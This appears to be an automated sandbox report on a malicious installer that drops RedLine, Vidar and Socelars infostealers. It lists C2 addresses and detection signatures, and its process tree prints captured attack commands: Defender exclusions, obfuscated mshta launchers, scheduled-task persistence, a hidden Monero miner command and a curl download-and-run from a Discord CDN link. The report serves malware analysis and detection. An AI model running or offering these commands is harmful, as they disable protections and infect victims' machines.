Overview

overview

10

Static

static

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows11_x64

10

setup_x86_...ll.exe

windows10_x64

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

Resubmissions

05-10-2021 16:27

211005-tx24csaah9 10

04-10-2021 16:37

211004-t43cpsgfe7 10

04-10-2021 07:39

211004-jhgtrsfhf8 10

03-10-2021 18:09

211003-wryvvsffgk 10

02-10-2021 23:31

211002-3hwsgaehhl 10

02-10-2021 06:10

211002-gxfh5sdgg7 10

01-10-2021 13:44

211001-q16deabhek 10

Analysis

  • max time kernel
    529s
  • max time network
    1800s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    03-10-2021 18:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    setup_x86_x64_install.exe

  • Size

    6.4MB

  • MD5

    c6e46aa3d6424b03e0a4ccb193d3eade

  • SHA1

    c8b49055743fa7b4d6a982aea26efb627bb1f2e1

  • SHA256

    5e2bf564a4f985a7482d505def1ec79c92566bf7eda4724811ee29b9c4a66156

  • SHA512

    06e0c7d8012d4dbf1e6ccb7049c16d3041eb792261cc9910115c8663a45272c90cbce0ccd51875b8cd465b8f5a5c9f69164cc665b60787884ac42aec3aa7d32e

Score
10/10
redlinesocelarsvidar921aniaspackv2discoveryevasioninfostealerpersistencespywarestealersuricatathemidatrojan

Malware Config

Extracted

Family

redline

Botnet

ANI

C2

45.142.215.47:27643

Extracted

Family

vidar

Version

41.1

Botnet

921

C2

https://mas.to/@bardak1ho

Attributes
  • profile_id

    921

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Modifies security service 2 TTPs 1 IoCs
    evasion
  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 2 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 35 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata
  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata
  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata
  • suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)

    suricata: ET MALWARE Win32.Raccoon Stealer CnC Activity (dependency download)

    suricata
  • suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt

    suricata: ET MALWARE Win32.Raccoon Stealer Data Exfil Attempt

    suricata
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

    evasion
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Vidar Stealer 1 IoCs
    stealer
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Blocklisted process makes network request 51 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Checks BIOS information in registry 2 TTPs 52 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 3 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 6 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 5 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 26 IoCs
    evasiontrojan
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 26 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Drops file in Program Files directory 23 IoCs
  • Drops file in Windows directory 28 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 34 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 64 IoCs
  • Kills process with taskkill 7 IoCs
    evasion
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 4 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: SetClipboardViewer 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3552
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4776
      • C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:4820
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
            PID:4132
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4564
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Fri1034cd265b5e0adcd.exe
            4⤵
              PID:4112
              • C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1034cd265b5e0adcd.exe
                Fri1034cd265b5e0adcd.exe
                5⤵
                • Executes dropped EXE
                PID:3480
                • C:\Windows\SysWOW64\mshta.exe
                  "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1034cd265b5e0adcd.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1034cd265b5e0adcd.exe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )
                  6⤵
                    PID:5296
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1034cd265b5e0adcd.exe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "" == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1034cd265b5e0adcd.exe" ) do taskkill -F -Im "%~nXU"
                      7⤵
                        PID:5512
                        • C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe
                          SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK
                          8⤵
                          • Executes dropped EXE
                          PID:5792
                          • C:\Windows\SysWOW64\mshta.exe
                            "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe ( cReATEOBJecT ( "WScRIPt.SHelL" ). RUn ( "C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" " , 0 , trUE ) )
                            9⤵
                              PID:5900
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"
                                10⤵
                                  PID:6072
                              • C:\Windows\SysWOW64\mshta.exe
                                "C:\Windows\System32\mshta.exe" vBsCRipT: CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn ("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )
                                9⤵
                                  PID:6048
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM
                                    10⤵
                                      PID:5192
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                        11⤵
                                          PID:3596
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"
                                          11⤵
                                            PID:1216
                                          • C:\Windows\SysWOW64\control.exe
                                            control .\FUEj5.QM
                                            11⤵
                                              PID:5652
                                              • C:\Windows\SysWOW64\rundll32.exe
                                                "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM
                                                12⤵
                                                • Loads dropped DLL
                                                PID:852
                                                • C:\Windows\system32\RunDll32.exe
                                                  C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM
                                                  13⤵
                                                    PID:5220
                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                      "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM
                                                      14⤵
                                                      • Loads dropped DLL
                                                      PID:5532
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill -F -Im "Fri1034cd265b5e0adcd.exe"
                                          8⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5600
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c Fri10b0a06a73706.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:5044
                                  • C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri10b0a06a73706.exe
                                    Fri10b0a06a73706.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1200
                                    • C:\Users\Admin\AppData\Roaming\8866579.scr
                                      "C:\Users\Admin\AppData\Roaming\8866579.scr" /S
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5776
                                    • C:\Users\Admin\AppData\Roaming\2402267.scr
                                      "C:\Users\Admin\AppData\Roaming\2402267.scr" /S
                                      6⤵
                                      • Executes dropped EXE
                                      • Adds Run key to start application
                                      PID:5872
                                      • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:5240
                                    • C:\Users\Admin\AppData\Roaming\2768772.scr
                                      "C:\Users\Admin\AppData\Roaming\2768772.scr" /S
                                      6⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:6100
                                    • C:\Users\Admin\AppData\Roaming\1294868.scr
                                      "C:\Users\Admin\AppData\Roaming\1294868.scr" /S
                                      6⤵
                                        PID:5704
                                      • C:\Users\Admin\AppData\Roaming\4697381.scr
                                        "C:\Users\Admin\AppData\Roaming\4697381.scr" /S
                                        6⤵
                                          PID:5744
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c Fri10584c049c7f.exe
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:3528
                                      • C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri10584c049c7f.exe
                                        Fri10584c049c7f.exe
                                        5⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:3204
                                        • C:\Users\Admin\Documents\uHQTVMa71BpO6ahOUBeXGh7S.exe
                                          "C:\Users\Admin\Documents\uHQTVMa71BpO6ahOUBeXGh7S.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:6012
                                        • C:\Users\Admin\Documents\Z0vWFXUapMHmh_phsDBKsg6d.exe
                                          "C:\Users\Admin\Documents\Z0vWFXUapMHmh_phsDBKsg6d.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          PID:4836
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 1732
                                            7⤵
                                            • Program crash
                                            • Checks processor information in registry
                                            • Enumerates system info in registry
                                            PID:5012
                                        • C:\Users\Admin\Documents\uFV1qYteW8OniKJlNEeZ9vlH.exe
                                          "C:\Users\Admin\Documents\uFV1qYteW8OniKJlNEeZ9vlH.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:2348
                                          • C:\Users\Admin\Documents\uFV1qYteW8OniKJlNEeZ9vlH.exe
                                            "C:\Users\Admin\Documents\uFV1qYteW8OniKJlNEeZ9vlH.exe"
                                            7⤵
                                            • Checks SCSI registry key(s)
                                            • Suspicious behavior: MapViewOfSection
                                            PID:5280
                                        • C:\Users\Admin\Documents\XAfzJJSyjz6aLSN1D1ltSV2W.exe
                                          "C:\Users\Admin\Documents\XAfzJJSyjz6aLSN1D1ltSV2W.exe"
                                          6⤵
                                            PID:2500
                                          • C:\Users\Admin\Documents\YkljOGa70o6I1XC7Gy3rDqXc.exe
                                            "C:\Users\Admin\Documents\YkljOGa70o6I1XC7Gy3rDqXc.exe"
                                            6⤵
                                              PID:2480
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 296
                                                7⤵
                                                • Program crash
                                                • Checks processor information in registry
                                                • Enumerates system info in registry
                                                PID:6876
                                            • C:\Users\Admin\Documents\lh2ZWaoIYwT9AEZddJ89Fx_y.exe
                                              "C:\Users\Admin\Documents\lh2ZWaoIYwT9AEZddJ89Fx_y.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:4636
                                              • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                7⤵
                                                • Executes dropped EXE
                                                • Drops startup file
                                                PID:5440
                                              • C:\Users\Admin\AppData\Local\Temp\Launcher.exe
                                                C:\Users\Admin\AppData\Local\Temp\Launcher.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:5612
                                                • C:\Windows\System32\conhost.exe
                                                  "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • Drops file in System32 directory
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5744
                                                  • C:\Windows\System32\cmd.exe
                                                    "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                                    9⤵
                                                      PID:1896
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                        10⤵
                                                          PID:6912
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                                          10⤵
                                                            PID:7808
                                                        • C:\Windows\System32\cmd.exe
                                                          "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
                                                          9⤵
                                                            PID:6932
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
                                                              10⤵
                                                              • Creates scheduled task(s)
                                                              PID:4680
                                                          • C:\Windows\System32\cmd.exe
                                                            "cmd" cmd /c "C:\Windows\system32\services64.exe"
                                                            9⤵
                                                              PID:6468
                                                              • C:\Windows\system32\services64.exe
                                                                C:\Windows\system32\services64.exe
                                                                10⤵
                                                                  PID:7612
                                                                  • C:\Windows\System32\conhost.exe
                                                                    "C:\Windows\System32\\conhost.exe" "C:\Windows\system32\services64.exe"
                                                                    11⤵
                                                                    • Drops file in System32 directory
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:5876
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                                                      12⤵
                                                                        PID:6020
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                                          13⤵
                                                                            PID:6544
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                                                            13⤵
                                                                              PID:14936
                                                                          • C:\Windows\system32\Microsoft\Libs\sihost64.exe
                                                                            "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                                                                            12⤵
                                                                              PID:9180
                                                                            • C:\Windows\System32\conhost.exe
                                                                              C:\Windows/System32\conhost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14444 --user=41zSmpNwAfHBxUh8HTq7Fsj2TXsGboB8GFeM8ek7xhc8QmL1TJCmoam94f57niQhKqiajN7KMWmAng1cNnMghXPi5bN3xNk.{COMPUTERNAME}/adwadw --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9usjHhXda167RDDOeCiLgdiepY0+9J4GWfDFBWRnvZEIn9njCW10s1hFXvQH+unnKdsaoBPNxSaPInK8O97Hj64jPqNG5qPd3DSjbVR1Cvuh9P29ZftnsNS50GnGtYvaNRBa6443D9MamN7WKSEjXwi5X466GHpLm7tClAm3T8zHW8BSKHq3yutkuduzGC2BYW5rxa17LYp4CzfKufpZJNPcoGIEVeut/xrvPPi+IYNCKrJPaDMN2ZJkpVGMqbuc5AF89xn8L6Lg1pYhaW8QjVZfQAkz7FVC8K667Gg6noLQpAyfd6lW36v4zbzg+fy82rNQmYSI3WMfiYNmvJM8DVc0772kBqEwUisr6ktdw4QlqXJe45Hvgu4yC2Rb6/ntnmOTLJz66c2h/wdUSvS18C67j6jsTvSh7k7avmCdG4sgS/BcyNsYOGIVjgNICoikSjNVrnFxCscaJerBnNPv197mrO4+rRF20+jzVnXKaNAmzbmoa4UjU13WSWasSDIT/lwH5kWp3uPfR1kinOL+sIQ==" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
                                                                              12⤵
                                                                                PID:7440
                                                                    • C:\Users\Admin\AppData\Local\Temp\Java.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\Java.exe
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:2904
                                                                      • C:\Windows\System32\conhost.exe
                                                                        "C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Java.exe"
                                                                        8⤵
                                                                        • Drops file in System32 directory
                                                                        PID:5824
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                                                          9⤵
                                                                            PID:5608
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                                              10⤵
                                                                                PID:6924
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                                                                10⤵
                                                                                  PID:6288
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
                                                                                9⤵
                                                                                  PID:6340
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Windows\system32\services32.exe"
                                                                                    10⤵
                                                                                    • Creates scheduled task(s)
                                                                                    PID:2052
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "cmd" cmd /c "C:\Windows\system32\services32.exe"
                                                                                  9⤵
                                                                                    PID:1528
                                                                                    • C:\Windows\system32\services32.exe
                                                                                      C:\Windows\system32\services32.exe
                                                                                      10⤵
                                                                                        PID:6384
                                                                                        • C:\Windows\System32\conhost.exe
                                                                                          "C:\Windows\System32\\conhost.exe" "C:\Windows\system32\services32.exe"
                                                                                          11⤵
                                                                                          • Drops file in System32 directory
                                                                                          PID:7688
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                                                                            12⤵
                                                                                            • Blocklisted process makes network request
                                                                                            • Executes dropped EXE
                                                                                            • Checks processor information in registry
                                                                                            PID:888
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                                                              13⤵
                                                                                                PID:5492
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                                                                                13⤵
                                                                                                  PID:4084
                                                                                              • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                                                                                                "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                                                                                                12⤵
                                                                                                  PID:8772
                                                                                                  • C:\Windows\System32\conhost.exe
                                                                                                    "C:\Windows\System32\\conhost.exe" "/sihost32"
                                                                                                    13⤵
                                                                                                      PID:8000
                                                                                      • C:\Users\Admin\Documents\hfNfszaiVyu9terbhxabjMWT.exe
                                                                                        "C:\Users\Admin\Documents\hfNfszaiVyu9terbhxabjMWT.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:4992
                                                                                        • C:\Users\Admin\Documents\hfNfszaiVyu9terbhxabjMWT.exe
                                                                                          "C:\Users\Admin\Documents\hfNfszaiVyu9terbhxabjMWT.exe"
                                                                                          7⤵
                                                                                            PID:5712
                                                                                          • C:\Users\Admin\Documents\hfNfszaiVyu9terbhxabjMWT.exe
                                                                                            "C:\Users\Admin\Documents\hfNfszaiVyu9terbhxabjMWT.exe"
                                                                                            7⤵
                                                                                              PID:5896
                                                                                            • C:\Users\Admin\Documents\hfNfszaiVyu9terbhxabjMWT.exe
                                                                                              "C:\Users\Admin\Documents\hfNfszaiVyu9terbhxabjMWT.exe"
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4948
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4992 -s 1048
                                                                                              7⤵
                                                                                              • Program crash
                                                                                              • Checks processor information in registry
                                                                                              • Enumerates system info in registry
                                                                                              PID:5276
                                                                                          • C:\Users\Admin\Documents\N0VjIjlb_wrY4X36qFb0KkVc.exe
                                                                                            "C:\Users\Admin\Documents\N0VjIjlb_wrY4X36qFb0KkVc.exe"
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks BIOS information in registry
                                                                                            • Checks whether UAC is enabled
                                                                                            PID:5648
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "cmd" /C c: && cd %tmp% && curl -O https://cdn.discordapp.com/attachments/864075800058789891/892369397816111135/Windows_Host.exe && start "" Windows_Host.exe
                                                                                              7⤵
                                                                                                PID:5660
